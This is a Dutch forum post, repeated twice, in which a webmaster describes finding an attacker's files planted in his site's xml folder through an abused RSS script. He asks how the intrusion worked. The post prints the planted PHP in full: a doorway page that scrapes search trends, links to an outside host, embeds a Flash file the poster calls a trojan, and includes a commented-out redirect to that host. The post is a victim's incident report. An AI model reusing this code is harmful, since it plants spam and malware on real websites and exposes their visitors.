Ik dacht laat ik dit maar even met jullie delen, omdat het gewoon apart is
:
Via google kwam ik deze resultaten tegen van een website van ons:
http://www.google.com/sea...opinie.nl&btnG=Zoeken&lr=
Op dat moment dacht ik, wat is hier aan de hand? Ik ben de desbetreffende map in gegaan en wat bleek? Er zat naast de xml bestanden ook een index.php, cache.txt en flash object (trojan) in. Wat bleek nou: ik ben in het verleden zo dom geweest om een rss script te gebruiken van het internet. Deze is misbruikt door een hacker en die heeft het volgende index.php bestand in de xml map gekregen:
Heb nu het script verwijderd, want het werd toch niet meer gebruikt (ja dom van me). Via robots.txt heb ik gezegd dat de hele map xml niet meer gevolgd mag worden. Het zal wel slechte effecten hebben gehad op me google resultaten, maar dat is mijn eigen stomme schuld.
Nu is alleen de vraag, hoe is het hem gelukt een index.php aan te maken via het rss script. Mijn eerste reactie was van "dom dom dom, nooit zomaar een bestaande script gebruiken van het internet" Echter ik ben nu het script aan het bekijken en vraag me de volgende vragen af:
1. Hoe is hij in godsnaam bij het script gekomen/gevonden? het zat in een map en dan nog eens een submap (heb nu wel de hele core van de website verplaatst boven de public_html map)
2. Ik weet dat het script xml bestanden kan aanmaken, maar hoe heeft hij het script laten werken voor zijn acties?
Ben erg nieuwsgierig hoe hij dit voor elkaar heeft gekregen.
Het script:
zie 2de bericht, kan het niet plaatsen in 1 bericht, krijg error
Tenslotte hoop ik dat niet meer mensen dit script hebben gebruikt natuurlijk.
Via google kwam ik deze resultaten tegen van een website van ons:
http://www.google.com/sea...opinie.nl&btnG=Zoeken&lr=
Op dat moment dacht ik, wat is hier aan de hand? Ik ben de desbetreffende map in gegaan en wat bleek? Er zat naast de xml bestanden ook een index.php, cache.txt en flash object (trojan) in. Wat bleek nou: ik ben in het verleden zo dom geweest om een rss script te gebruiken van het internet. Deze is misbruikt door een hacker en die heeft het volgende index.php bestand in de xml map gekregen:
PHP:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
| <?php function getmsncontent ($terms,$keys=0) { sort ($keys); $terms = urlencode($terms); $source = "http://search.live.com/results.aspx?q=$terms&count=100&first=28&mkt=en-US"; $a=@file_get_contents($source); preg_match_all("/<h3>(.*?)<\/p>/",$a,$match); preg_match("/Related searches(.*?)<\/ul>/",$a,$ma); preg_match_all("/<li>(.*?)<\/li>/",$ma[1],$rel); asort ($rel[1]); foreach ($rel[1] as $rela) { // $relst=$relst."<li><a href=./?".urlencode(trim(strip_tags($rela))).">".trim(strip_tags($rela))."</a></li>"; //$relst=$relst."<li>".trim(strip_tags($rela))."</li>"; } //$relst="<ul>".$relst."</ul>"; $zuga=$match[1]; $zuga=array_unique($zuga); //shuffle ($zuga); foreach ($zuga as $col=>$zop) { if ($keys) { $zop=strip_tags($zop); $zop=preg_replace("/href=\"(.*?)this\)/","href=\"?".$terms."",$zop); if ($keys[$col]) { $zopa.="<p>".strip_tags($zop,"<p><strong>")." <p><a href=./?".$keys[$col]."><img src=http://pptk.kwik.to/pictures/".$keys[$col].".jpg border=0 alt=\"".strtoupper(urldecode ($keys[$col]))."\">".strtoupper(urldecode ($keys[$col]))."</a></p></p>\n<br>"; }else { $zopa.="<p>".$zop."</p>\n<br>"; } }else { $zopa.=strip_tags($zop); } } $zopa=str_replace("...","",$zopa); return $relst." ".$zopa; } function gettrendsrelate ($url){ $relpage=file_get_contents(trim ($url)); if ($relpage) { preg_match("/<b>Related searches:<\/b><br>(.*?)<br><br>/s",$relpage,$match); if ($match[1]) { return $match[1]; } } } function gettrends() { $trendurl="http://www.google.com/trends/hottrends/atom/hourly"; $trendpage=@file_get_contents($trendurl); if ($trendpage) { preg_match_all ("/><a href=\"(.*?)\">(.*?)<\/a>/",$trendpage,$match); $result['urls']=$match[1]; $result['keys']=$match[2]; preg_match("/<updated>(.*?)<\/updated>/",$trendpage,$match2); $result['update']=preg_replace("/[^0-9]/","",$match2[1]); } else { $result['err']="1"; } return $result; } if (time()>@filectime("cache.txt")+3600 or (!(is_file("cache.txt")))) { $keys=gettrends(); $a=fopen ("cache.txt","w"); foreach ($keys[keys] as $colu=>$key) { $key=preg_replace("/[^A-z0-9 ]/","",$key); $keyst=$keyst."qqqqx".urlencode($key); } fwrite($a,base64_decode($keyst)); fclose ($a); } $keys=split ("qqqqx",base64_encode(file_get_contents("cache.txt"))); $key=urldecode($_SERVER['QUERY_STRING']); //$js='<img src="http://pptk.kwik.to/head.gif" onerror="document.location=\''."http://pptk.kwik.to/?q=".urlencode(preg_replace("/\//","",$key)).'\';">'; $js='<object codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,0,0" id="home"><param name="movie" value="banner.swf"><embed src="banner.swf" quality="high" name="home" type="application/x-shockwave-flash" pluginspage="http://www.macromedia.com/go/getflashplayer"></object>'; $temp='<HTML> <HEAD> <TITLE>'.strtoupper($key).'</TITLE> <META http-equiv=Content-Type content="text/html; charset=utf-8"> <META content="index,follow" name=ROBOTS> <META http-equiv="Content-Language" content="en"> <meta name="ROBOTS" content="NOARCHIVE"> </HEAD> <BODY> '.$js.' <H1>'.strtoupper($key).'</H1> '.getmsncontent($key,$keys,$_GET['hoh']); echo "<a href=\"\">$key</a>"; echo $temp; echo "</BODY> </HTML>"; ?> |
Heb nu het script verwijderd, want het werd toch niet meer gebruikt (ja dom van me). Via robots.txt heb ik gezegd dat de hele map xml niet meer gevolgd mag worden. Het zal wel slechte effecten hebben gehad op me google resultaten, maar dat is mijn eigen stomme schuld.
Nu is alleen de vraag, hoe is het hem gelukt een index.php aan te maken via het rss script. Mijn eerste reactie was van "dom dom dom, nooit zomaar een bestaande script gebruiken van het internet" Echter ik ben nu het script aan het bekijken en vraag me de volgende vragen af:
1. Hoe is hij in godsnaam bij het script gekomen/gevonden? het zat in een map en dan nog eens een submap (heb nu wel de hele core van de website verplaatst boven de public_html map)
2. Ik weet dat het script xml bestanden kan aanmaken, maar hoe heeft hij het script laten werken voor zijn acties?
Ben erg nieuwsgierig hoe hij dit voor elkaar heeft gekregen.
Het script:
zie 2de bericht, kan het niet plaatsen in 1 bericht, krijg error
Tenslotte hoop ik dat niet meer mensen dit script hebben gebruikt natuurlijk.
Webontwikkelaar - Kitesurfer | Gamer